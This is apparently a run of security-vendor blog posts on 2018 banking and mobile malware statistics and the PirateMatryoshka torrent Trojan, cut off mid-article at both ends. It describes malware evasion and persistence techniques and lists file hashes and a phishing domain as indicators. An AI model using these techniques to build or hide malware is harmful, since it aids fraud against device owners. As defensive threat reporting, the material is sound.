2017 was more stable and the number of users who encountered mobile malware reached 515,816. But then there was a game changer.

In April 2018 the number of attacked users started to rise rapidly, with the overall figure reaching 1,799,891 – which means that it has more than tripled in just a year. As it can be seen, this was mainly due to two peaks in the periods from April to June and July to September.

Kaspersky Lab experts took a closer look at the reasons why this may have happened.

To do this, they reviewed the most widespread families across the year.

Back in 2017, the distribution of the major families was calm and smooth with the statistic looking more or less balanced.

Fig. 20: The most widespread Android banking malware in 2017

If we take the overall number of detections, the absolute leaders in 2017 were Asacub, Faketoken and Hqwar. Let’s look at them a bit more closely.

Asacub, constantly evolving malware, is spread via SMS and its distribution is uneven with several peaks across the year:

Fig.21: The change in the number of users attacked by the Asacub Android banking Trojan

At the same time, Faketoken evened out its activities, gradually lowering its hits from 13,563 in January, to 3,872 in December.

Fig.22: The change in the number of users attacked by Faketoken Android banking malware

The third major player in the field, Hqwar, demonstrated an almost identical picture.

Fig.23: The change in the number of users attacked by Hqwar Android banking malware

2018 was different.

Fig. 24: The most widespread Android banking malware in 2018

Asacub peaked more than twice to almost 60%, followed by Agent(14.28%) and Svpeng (13.31%). All three of them experienced explosive growth in 2018, especially Asacub as it peaked from 146,532 attacked users in 2017 to 1,125,258.

As the statistics show, this is a general trend as almost all more or less active families ramped up their activities in 12 months. But let’s have a closer look on top three families in 2018.

Fig.25: The change in the number of users attacked by the Asacub Android banking Trojan

As graph above shows, Asacub was quite stable across the year apart from two peaks that made it a leader – periods between May and July and July and October.

Fig.26: The change in the number of users attacked by the Agent Android banking Trojan

Agent experienced more consistent spikes – overall it was performing very active from February to April and Aprilto July, with a more stable distribution of attacks – around 20,000 to 30,000 attacked users per month.

Fig.27: The change in the number of users attacked by the Svpeng Android banking Trojan

Svpeng demonstrates another picture entirely. This malware family was not very active for almost half a year, then kicking off in May and growing until June with almost 100,000 attacked users. There was then a gradual fall for the rest of the year. Geography of attacked users

In previous reports, we calculated the distribution of users attacked with Android Banking Trojans by comparing the overall number of unique users attacked by this type of malware with the overall number of users in a region. There was always one problem – for the majority of detection found in Russia traditionally come from this malicious software due to the prevalence of SMS banking in the region, which allows attackers to steal money with a simple text message if an infection is successful. Previously, the same was true for SMS Trojans, but after regulative measures, criminals have found a new way to capitalize on victims in Russia.

This year we decided to change the methodology replacing the overall number of attacked unique users to the overall number of users registered in the respected region.

In 2017 the landscape was the following:

Australia 1.05% Turkmenistan 0.82% Russia 0.8% Turkey 0.46% Kazakhstan 0.39% Uzbekistan 0.37% Tajikistan 0.3% Poland 0.25% Latvia 0.22% Germany 0.22%

Fig. 28: The top 10 countries with the highest percentage of users that encountered Android banking malware in 2017

In 2018, the picture changed:

Russia 2.32% South Africa 1.27% US 0.82% Australia 0.71% Armenia 0.51% Poland 0.46% Moldova 0.44% Kyrgyzstan 0.43% Azerbaijan 0.43% Georgia 0.42%

Fig. 29: The top 10 countries with the highest percentage of users that encountered Android banking malware in 2018

As we can see, mobile malware is indeed on the rise with the around two-digit growth in the average level of infections in top 10 countries. In 2018, Russia jumped up to first place, followed by South Africa and the US. Australia dropped to fourth position while Turkmenistan left the chart for good.

Major changes to the Android banking malware landscape

While figures tell their own story, there are many more ways to explore changes and developments in the threat landscape. Our key method is the analysis of actual malware found in the wild.

As this analysis shows, 2018 could be the fiercest cybercriminal onslaught ever seen when it comes to malicious mobile software. Last year it seemed that the threat balanced both in terms of number of unique samples discovered and the number of attacked users.

However, 2018 indicated that the situation had radically changed for the worse. The root cause of this rise is not clear, but the main culprits are the creators of the Asacub and Hqwar Trojans. The former has quite a long history – according to our data, the group behind it has been at work for more than three years. Asacub itself evolved from an SMS Trojan that was armed from the get-go with tools to counteract deletion and intercept incoming calls and SMS messages. Later, the creators of the malware beefed up its logic and began mass distribution using the same attack vector as before: social engineering via SMS. Online forums where people often expect messages from unfamiliar users became a source of mobile numbers. Next, the avalanche propagation method kicked in, with infected devices themselves becoming distributors – Asacub would be sent everyone in a victim’s contact list.

However, banking Trojans in 2018 were noteworthy not just in terms of scale but mechanics as well. One aspect of this is the increasingly common use of Accessibility Services in banking threats. This is partly a response to new versions of Android that make it increasingly difficult to overlay phishing windows on top of banking apps, the Trojan lodges itself in the device so that users cannot remove it by themselves. What’s more, cybercriminals can use Accessibility Services to hijack a perfectly legitimate application and force it, for example, to launch a banking app to make a money transfer right there on the victim’s device. Techniques have also appeared to counter dynamic analysis; for example, the Rotexy Trojan checks to see if it is running in a sandbox. However, this is not exactly a new thing, since we have observed such behavior before. That said, it should be noted that combined with obfuscation, anti-dynamic analysis techniques can be effective if virus writers manage to infiltrate their Trojan into a popular app store, in which case both static and dynamic processing may be powerless. Although sandbox detection cannot be said to be common practice among cybercriminals, the trend is evident, and we are inclined to believe that such techniques will become very sophisticated in the near future.

Conclusion and advice

2018 demonstrated that criminals keep updating their malware with new features, investing resources into new ways of distribution and into the development of detection avoidance techniques.

They also expand their list of victims adding new institution and industries to it.

This all means that they still get financial gain out of their activities.

As the above threat data shows, there is still plenty of room for financial fraud operations involving phishing and specific banking malware in this sphere. At the same time, mobile malware regained its power jeopardizing users across the world.

In order to avoid the risk of losing money as a result of a cyberattack, Kaspersky Lab’s experts advise the following:

For home users

  • Don’t click on suspicious links. They are mostly designed to download malware onto your device or lead you to phishing webpages, which intend to steal your credentials.
  • Never open or store unfamiliar files on your device as they could be malicious.
  • Always stay vigilant when using public Wi-Fi networks as they can be insecure and unreliable, making hotspots a prime target for hackers to steal user information. To keep your confidential information safe, never use hotspots to make online payments or share financial information.
  • Websites can be a front for cybercriminals, with the sole purpose of harvesting your data. To stop your confidential details from falling into the wrong hands, if a site seems suspicious or is unfamiliar, do not enter your credit card details or make a purchase.
  • To avoid compromising your credentials through a mobile banking application, make sure you use the official app for your financial services, and ensure it is not compromised. Download apps only from official app stores, such as Google Play or the iOS App Store.
  • To avoid falling into a trap, always check that the website is genuine, by double- checking the format of the URL or the spelling of the company name, before entering any of your credentials. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference.
  • To give you more confidence when assessing the safety of a website, only use websites which begin with HTTPS:// and therefore run across an encrypted connection. HTTP:// sites do not offer the same security and could put your information at risk as a result.
  • Never disclose your passwords or PIN-codes to anyone – not even your closest family and friends or your bank manager. Sharing these will only increase the level of risk and exposure to your personal accounts. This could lead to your financial information being accessed by cybercriminals, and your money stolen.
  • To help prevent financial fraud, a dedicated security solution on your device, with built-in features, will create a secure environment for all of your financial transactions. Kaspersky Lab’s Safe Money technology is designed to offer this level of protection to users and provide peace of mind. Use reliable security solutions for comprehensive protection from a wide range of threats, such as Kaspersky Security Cloud and Kaspersky Internet Security.
  • To keep your credentials safe, it is important to apply the same level of vigilance and security across all of your devices – whether desktop, laptop or mobile. Cybercriminal exploits have no boundaries, so your security needs to be just as widespread to minimize the risk of your information falling into the wrong hands. Use a reliable security solution for storing valuable digital data, such as Kaspersky Password Manager.

For businesses

  • Pay specific attention to endpoints from which financial operations are being completed: update the software installed on these endpoints first, and keep their security solution up to date.
  • Invest in regular cybersecurity awareness training for employees to educate them not to click on links or open attachments received from untrusted sources. Conduct simulated phishing attack to ensure that they know how to distinguish phishing emails.
  • If you use cloud email services, make sure you have installed a dedicated protection for your email – such as Kaspersky Security for Microsoft Office 365 – to strengthen your protection against business email compromise.
  • Ensure all levels of your corporate infrastructure are protected, from core data centers to specialized systems in the case of banking infrastructure (such as ATMs). For ATM and POS use solutions designed specifically for these systems, such as Kaspersky Embedded Systems Security, which protect even devices with weak or legacy hardware.
  • Provide your security operation center team with access to Threat Intelligence so it remains up to date with the latest tactics and tools used by cybercriminals
  • Leverage advanced detection and response technologies, such as Kaspersky Endpoint Detection and Response, part of Threat Management and Defense solution. It makes it possible to catch even unknown banking malware and gives security operation teams full visibility over the network and response automation.
  • To ensure protection for their clients, financial institutions should use solutions that can prevent fraud. For example, Kaspersky Fraud Prevention analyzes events that occur during the entire session and prevents fraud in real time.
2019. március 6.

Pirate matryoshka

The use of torrent trackers to spread malware is a well-known practice; cybercriminals disguise it as popular software, computer games, media files, and other sought-after content. We detected one such campaign early this year, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs.

We noticed that the tracker contained malicious torrents created from dozens of different accounts, including ones registered on TBP for quite some time.

Torrent content

Instead of the expected software, the file downloaded to the user’s computer was a Trojan, whose basic logic was implemented by SetupFactory installers. Our security solutions detect the malware as Trojan-Downloader.Win32.PirateMatryoshka.

At the initial stage, the installer decrypts another SetupFactory installer for displaying a phishing web page.

The page opens directly in the installation window and requests the user’s TBP account credentials, supposedly to continue the process.

The compromised accounts were most likely used by the cybercriminals to spread more malicious torrents on the resource — we noted above that not only newly created accounts were used for this purpose.

Before performing the next step, PirateMatryoshka verifies that it is running in the attacked system for the first time. To do so, it checks the registry for the path HKEY_CURRENT_USER\Software\dSet. If it exists, further execution is terminated. If the checking result is negative, the installer prods the pastebin.com service for a link to the additional module and its decryption key.

The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence:

The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (classified by us as Adware). They usually make their way to users through file sharing sites — besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel. For example, in InstallCapital the full list of installable software is placed at the end of the license agreement:

And in MegaDowl, the list is hidden behind the seemingly inactive Advanced settings button:

The other two files are autoclickers written in VisualBasic, which are required to prevent the user from canceling the installation of the additional software (in which case the cybercriminals go empty-handed). The autoclickers are run before the installers; when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

As a result of PirateMatryoshka’s efforts, the victim computer is flooded with unwanted programs that pester the user and waste system resources. On a separate note, the owners of file partner programs often do not track the programs offered in their downloaders. Our research shows that one in five files offered by partner installers is malicious — among those we encountered pBot, Razy, and others.

Conclusion

Cybercriminals are always coming up with new kinds of fraud. In this particular case, they employed a method for delivering malicious content through torrent trackers to install adware on user computers. As a result, many TPB users not only picked up adware or malware on their machines, but had their accounts compromised.

Kaspersky Lab solutions detect PirateMatryoshka and its components with the following verdicts:

Trojan-Downloader.Win32.PirateMatryoshka
Trojan.Win32.InstClick
AdWare.Win32.StartSurf
AdWare.Win32.SmartInstaller
AdWare.Win32.Generic

IOCs

66860309953dc7cd7faee88ec90a81f6
7576b8677975261fbb1e799d0231ec01
64dc8f3197607dbf652b985edb99ad4e
035cff7c52460a69f77a0a09db05a6f7
a85f90f07dd9e8aab51c65d8287ec6be
a857ae5cb87b23359ed70b8177aa44d3
45d4df9b38a8f8da385714f32415cd34

Phishing domain

www.mobilekey[.]pw

2019. március 5.

Mobile malware evolution 2018

The statistical data for this report came from all Kaspersky Lab mobile security solutions, not just Kaspersky Mobile Antivirus for Android. Consequently, the comparative data for 2017 may differ from the data for the same period published in the previous report. The analytical scope was expanded due to the growing popularity of various Kaspersky Lab products and their geographical reach, which made it possible to obtain statistically reliable data. On the whole, the more products we use in compiling the statistics, the more accurate the mobile threatscape that emerges.

Figures of the year

In 2018, Kaspersky Lab products and technologies detected:

  • 5,321,142 malicious installation packages
  • 151,359 new mobile banking Trojans
  • 60,176 new mobile ransomware Trojans
Trends of the year

Users of mobile devices in 2018 faced what could be the strongest cybercriminal onslaught ever seen. Over the course of the year, we observed both new mobile device infection techniques (for example, DNS hijacking) and a step-up in the use of tried-and-tested distribution schemes (for example, SMS spam). Virus writers were focused on:

  • Droppers (Trojan-Dropper), designed to bypass detection
  • Attacks on bank accounts via mobile devices
  • Apps that can be used by cybercriminals to cause damage (RiskTool)
  • Adware apps

In 2018, we uncovered three mobile APT campaigns aimed primarily at spying on victims, including reading messages in social networks. Alongside these campaigns, this report touches on all the major events in the world of mobile threats that occurred during the year.

Rise of the droppers

In the past three years, dropper Trojans have become the weapon of choice for cybercriminals specializing in mobile malware. The methods for assembling these Matryoshka-like programs were streamlined, allowing them to be easily created, used and sold by various groups. A dropper creator may have several clients involved in developing ransomware Trojans, banking Trojans, and apps showing persistent ads. Droppers are used as a means to hide the original malicious code, which simultaneously:

  • Counteracts detection. The dropper works particularly well against detection based on file hashes, since it generates a new hash each time, while the malware inside does not change a single byte.
  • Enables any number of unique files to be created. Virus writers need this, for instance, when using their platform with a fake app store.

Although mobile droppers are nothing new, in Q1 2018 we saw a sharp rise in the number of users attacked by packed malware. The biggest contribution was made by members of the Trojan-Dropper.AndroidOS.Piom family. Growth continued in Q2 and beyond, but much more smoothly. There is no doubt that established groups that have not yet embraced droppers will soon either create their own or buy ready-made ones. This trend will affect the statistical map of detected threats: we will see fewer unique mobile malware families, replaced by droppers of various kinds.

Banking Trojans ride the wave

Last year’s stats on the number of attacks involving mobile banking Trojans were eye-catching. At the beginning of 2018, it seemed that this type of threat had stabilized both by number of unique samples discovered and by number of users attacked. However, already by Q2 the situation had radically changed for the worse. New records were set in terms of both number of mobile banking Trojans detected and number of attacked users. The root cause of this hike is not clear, but the main culprits are the creators of the Asacub and Hqwar Trojans. The former has quite a long history — according to our data, the group behind it has been at work for more than three years. Asacub itself evolved from an SMS Trojan that was armed from the get-go with tools to counteract deletion and intercept incoming calls and SMS messages. Later, the creators of the malware beefed up its logic and began mass distribution using the same attack vector as before: social engineering via SMS. Online forums where people often expect messages from unfamiliar users became a source of mobile numbers. Next, the avalanche propagation method kicked in, with infected devices themselves becoming distributors — Asacub sent itself to everyone in the victim’s phone book.

However, banking Trojans in 2018 were noteworthy not just in terms of scale, but mechanics as well. One aspect of this is the increasingly common use of Accessibility Services in banking threats. This is partly a response to new versions of Android that make it increasingly difficult to overlay phishing windows on top of banking apps, and partly the fact that using Accessibility allows the Trojan to lodge itself in the device so that users cannot remove it by themselves. What’s more, cybercriminals can use Accessibility Services to hijack a perfectly legitimate application and force it, say, to launch a banking app to make a money transfer right there on the victim’s device. Techniques have also appeared to counter dynamic analysis; for example, the Rotexy Trojan checks to see if it is running in a sandbox. However, this is not exactly a new thing, since we have observed such behavior before. That said, it should be noted that combined with obfuscation, anti-dynamic analysis techniques can be effective if virus writers manage to infiltrate their Trojan into a popular app store, in which case both static and dynamic processing may be powerless. Although sandbox detection cannot be said to be common practice among cybercriminals, the trend is evident, and we are inclined to believe that such techniques will become very sophisticated in the near future.

Adware and potentially dangerous software

Throughout 2018, these two classes of mobile apps were in the Top 3 by number of installation packages detected. The reasons for this are many, but chief among them is the fact that adware and attacks on advertisers are a relatively safe method of enrichment for cybercriminals. Attacks of this kind do not cause damage to mobile device owners, save for some rare cases of devices overheating and burning up from the activity of an adware app deployed on them with root access. The harm is done to advertisers, since they pay for their banners being clicked by robots — infected mobile devices. Sure, there are adware apps that make it near impossible to use an infected device. For example, the victim might have to click on a dozen banners before being able to send an SMS. The problem is compounded by the fact that at the initial stages the user does not know which app installation (a flashlight or favorite game, say) led to such dire consequences, since ads are shown at random times and outside the interface of the adware-carrying app. And it only takes one such app to be installed and started for another dozen similar ones to appear, turning the device into an adware zombie. In the worst case scenario, this new wave will have a module with an exploit allowing it to write itself to the system directory or the factory settings rollback script. After that, the only way to restore the operational capacity of the device is to search for the original factory version of the firmware and download it via USB.

On a separate note, one click per banner costs less than a peanut, which is the key reason for the endless stream of unique adware apps — the more of them cybercriminals create and distribute, the more money they get. Lastly, adware modules are often coded without taking into account the confidentiality of the data transmitted, which means that requests to the advertiser’s infrastructure can be sent in unencrypted HTTP traffic and contain any amount of information about the victim, up to and including geolocation.

A slightly different situation is seen with RiskTool software, which had the largest share of all mobile threats detected in 2018. In-app purchases have long been a feature worldwide, whereby the device is tied to an account linked to a bank card. All processes are transparent to the user, and purchases can be canceled. RiskTool-type apps also feature an option for users to buy access to new levels in a game or a picture of a pretty girl, for example, but payment is totally non-transparent to the user. The app itself sends an SMS to a special number without any user involvement, and receives a confirmation message, which RiskTool reacts to; hence, the app knows about the successful payment and shows the purchased content. But the release of the promised content remains at the discretion of the app creators.

As a result, there is a huge number of RiskTool programs used to sell any content, but not requiring any significant development effort — in terms of technical implementation, sending a single SMS is doable for any novice programmer.

There is currently no reason to believe that the flood of adware and RiskTool-class apps will abate, and in 2019 we will likely see a similar picture.

Sharp rise in mobile miners

In 2018, we observed a fivefold increase in attacks using mobile miner Trojans. This growth can be attributed to several factors:

  • Mobile devices are being fitted with ever more powerful graphics processors, making them a more effective tool for cryptocurrency mining
  • Mobile devices are relatively easy to infect
  • Mobile devices are ubiquitous

Although miners are not the most conspicuous type of mobile malware, the load they generate is easily detectable by the device owner. And as soon as the latter suspects malicious activity, they will take measures to get rid of the infection. So to compensate for the outflow of victims, cybercriminals are deploying new large-scale campaigns and enhancing their malware anti-removal mechanisms.

Technologically unpretentious, mobile miners are usually based on ready-made cross-platform malware code (for example, one that works well on Linux) — one needs only to insert receiving cryptocurrency wallet address and wrap the payload inside a mobile app with a minimal graphical interface. Distribution is via various kinds of spam and other typical methods.

Although miners cannot claim to have dislodged other mobile malware from the top positions in 2018, this does not negate the seriousness of the threat. If the miner is poorly coded or its author too greedy, the malware can damage the device’s battery or, worse, cause it to overheat and fail.

Statistics

In 2018, we detected 5,321,142 malicious mobile installation packages, which is down 409,774 on last year.

Despite this drop, in 2018 we recorded a doubling of the number of attacks using malicious mobile software: 116.5 million (against 66.4 million in 2017).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of attacks defeated by Kaspersky Lab products, 2018 (download)

The number of attacked users also continued its upward trajectory. From the beginning of January to the end of December 2018, Kaspersky Lab protected 9,895,774 unique users of Android devices — up 774,000 against 2017.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of attacked users, 2018 (download)

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of attacked users, 2018 (download)

Top 10 countries by share of users attacked by mobile malware

Country* %** Iran 44.24 Bangladesh 42.98 Nigeria 37.72 India 36.08 Algeria 35.06 Indonesia 34.84 Pakistan 32.62 Tanzania 31.34 Kenya 29.72 Philippines 26.81

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

Both Iran (44.24%) and Bangladesh (42.98%) retained their leading positions in the Top 10, but in Iran the percentage of infected devices fell significantly by 13 p.p. As in the previous year, the most widespread malware in Iran was the Trojan.AndroidOS.Hiddapp family. In Bangladesh, as in 2017, adware programs from the Ewind family were most common.

Nigeria (37.72%) climbed from fifth place in 2017 to third; the most common adware programs there come from the Ocikq, Agent, and MobiDash families.

Types of mobile malware

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of new mobile threats by type, 2017 and 2018 (download)

Of all detected threats in 2018, the situation with mobile ransomware Trojans (1.12%) was the rosiest, with their share cut drastically by 8.67 p.p. It was a similar story with spyware Trojans (1.07%), whose share fell by 3.55 p.p. Adware apps (8.46%) also lost ground in comparison with 2017.

Trojan-Dropper threats were a marked exception, almost doubling their share from 8.63% to 17.21%. This growth reflects cybercriminals’ appetite to use mobile droppers to wrap all sorts of payloads: banking Trojans, ransomware, adware, etc. This trend looks set to continue in 2019.

Unfortunately, like Trojan-Dropper, the share of financial threats in the shape of mobile bankers also practically doubled — from 1.54% to 2.84%.

Surprisingly, SMS Trojans (6.20%) made the Top 5 by number of objects detected. This dying breed of threats is common only in a handful of countries, but that did not stop its share from increasing against 2017. Although there is no imminent talk of a revival of this class, it is still worth disabling paid subscriptions on your mobile device.

Creators of RiskTool-class threats in 2018 were just as active as last year, and not only reclaimed top position (52.06%), but even showed a slight increase.

Top 20 mobile malware

The malware rating below does not include potentially unwanted software, such as RiskTool and AdWare.

Verdict %* 1 DangerousObject.Multi.Generic 68.28 2 Trojan.AndroidOS.Boogr.gsh 10.67 3 Trojan-Banker.AndroidOS.Asacub.a 6.55 4 Trojan-Banker.AndroidOS.Asacub.snt 5.19 5 Trojan-Dropper.AndroidOS.Hqwar.ba 3.78 6 Trojan-Dropper.AndroidOS.Lezok.p 3.06 7 Trojan-Banker.AndroidOS.Asacub.ce 2.98 8 Trojan-Dropper.AndroidOS.Hqwar.gen 2.96 9 Trojan-Banker.AndroidOS.Asacub.ci 2.95 10 Trojan-Banker.AndroidOS.Svpeng.q 2.87 11 Trojan-Dropper.AndroidOS.Hqwar.bb 2.77 12 Trojan-Banker.AndroidOS.Asacub.cg 2.31 13 Trojan.AndroidOS.Triada.dl 1.99 14 Trojan-Dropper.AndroidOS.Hqwar.i 1.84 15 Trojan-Dropper.AndroidOS.Piom.kc 1.61 16 Exploit.AndroidOS.Lotoor.be 1.39 17 Trojan.AndroidOS.Agent.rx 1.32 18 Trojan-Banker.AndroidOS.Agent.dq 1.31 19 Trojan-Dropper.AndroidOS.Lezok.b 1.22 20 Trojan.AndroidOS.Dvmap.a 1.14

* Share of all users attacked by this type of malware in the total number of users attacked.

Wrapping up 2018, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (68.28%) used for malware detected using cloud technologies in cases when the Anti-Virus databases still have no signatures or heuristics to detect it. This way, the most recent malware is uncovered.

In second place was the verdict Trojan.AndroidOS.Boogr.gsh (10.67%). This is assigned to files recognized as malicious by our machine-learning system.

Third, fourth, seventh, and ninth positions were taken by members of the Trojan-Banker.AndroidOS.Asacub family, one of the main financial threats of 2018.

Fifth and eighth places went to Trojan droppers in the Trojan-Dropper.AndroidOS.Hqwar family; they can contain malware of various families related to financial threats and adware.

The Top 10 threats also featured the old-timer Trojan-Banker.AndroidOS.Svpeng.q (2.87%), which was the most common mobile banking Trojan in 2016. This Trojan uses phishing windows to steal bank card data, and also attacks SMS banking systems.

Of particular note in the ranking are positions 13 and 20, occupied respectively by Trojan.AndroidOS.Triada.dl (1.99%) and Trojan.AndroidOS.Dvmap.a (1.44%). These two Trojans are extremely dangerous, since they use superuser privileges to carry out their malicious activity. In particular, they place their components in the device’s system area, which the user only has read access to, and hence they cannot be removed using regular system tools.

Mobile banking Trojans

In 2018, we detected 151,359 installation packages for mobile banking Trojans, which is 1.6 times more than in the previous year.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, 2018 (download)

Monitoring the activity of mobile banking Trojans, we registered a giant leap in the number of attacks using this malware. Nothing like this has ever been observed before. The growth began in May 2018, and the attacks peaked in September. The culprits were the Asacub and Hqwar families, due to their members spreading with record frequency.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of attacks by mobile banking Trojans, 2017 and 2018 (download)

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries by share of users attacked by mobile bankers, 2018 (download)

Top 10 countries by share of all users attacked by mobile bankers

Country* %** Russia 2.32 South Africa 1.27 US 0.82 Australia 0.71 Armenia 0.51 Poland 0.46 Moldova 0.44 Kyrgyzstan 0.43 Azerbaijan 0.43 Georgia 0.42

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

In top position, like last year, was Russia, where 2.32% of users encountered mobile banking Trojans. The most common familes in Russia were Asacub, Svpeng, and Agent.

In second-place South Africa (1.27%), where members of the Agent banking family were the most active spreaders. US users (0.82%) most frequently encountered members of the Svpeng and Asacub banking families.

The most common family of mobile bankers in 2018 was Asacub — its members attacked 62.5% of all users who encountered mobile bankers.

Mobile ransomware Trojans

The statistics for Q1 2018 showed that the number of ransomware Trojans spreading without the assistance of droppers or downloaders had radically decreased. The reason for this was the ubiquitous use of a two-stage mechanism for distributing these malicious programs through Trojan droppers. A total of 60,176 mobile ransomware installation packages were detected throughout 2018, which is nine times less than in 2017.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, 2018 (download)

The number of attacks involving mobile ransomware gradually declined over the first half of the year. However, June 2018 saw a sharp increase in the number of attacks, almost 3.5-fold.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of attacks by mobile ransomware Trojans, 2017 and 2018 (download)

In 2018, Kaspersky Lab products protected 80,638 users in 150 countries against mobile ransomware.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries by share of users attacked by mobile ransomware, 2018 (download)

Top 10 countries by share of all users attacked by mobile ransomware

Country* %** US 1.42 Kazakhstan 0.53 Italy 0.50 Poland 0.49 Belgium 0.37 Ireland 0.36 Austria 0.28 Romania 0.27 Germany 0.26 Switzerland 0.22

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

For the second year running, the country most under attack from mobile ransomware was the US, where 1.42% of users encountered it. As in the previous year, members of the Trojan-Ransom.AndroidOS.Svpeng family were the most common ransomware Trojans in the country.

In second-place Kazakhstan (0.53%), the most active ransomware familes were Trojan-Ransom.AndroidOS.Small and Trojan-Ransom.AndroidOS.Rkor. The latter is not unlike other ransomware in that it shows victims an indecent picture and accuses them of viewing illegal materials.

In actual fact, the Trojan does not carry off any personal data or “suspend the servicing of the device”, as the warning claims. But the process of removing malware from an infected device can be difficult.

Conclusion

For seven years now, the world of mobile threats has been constantly evolving, not only in terms of number of malicious programs and technological refinement of each new malware modification, but also due to the increasing ways in which money and valuable information can be acquired using mobile devices. The year 2018 showed that a relative lull in certain types of malware can be followed by an epidemic. Last year, it was the banking Trojan Asacub and co.; in 2019 it could be a wave of ransomware, seeking to make up lost ground.

2019. február 26.

How to Attack and Defend a Prosthetic Arm

The IoT world has long since grown beyond the now-ubiquitous smartwatches, smartphones, smart coffee machines, cars capable of sending tweets and Facebook posts and other stuff like fridges that send spam. Today’s IoT world now boasts state-of-the-art solutions that quite literally help people. Take, for example, the biomechanical prosthetic arm made by Motorica Inc. This device helps people who have lost their limb to restore movement.

Via dedicated sensors, the biomechanical prosthetic arm reads the muscle contraction parameters and analyzes them to produce movements with the robotic fingers. The arm takes little time to get used to standard movements, after which it becomes a full-fledged assistant.

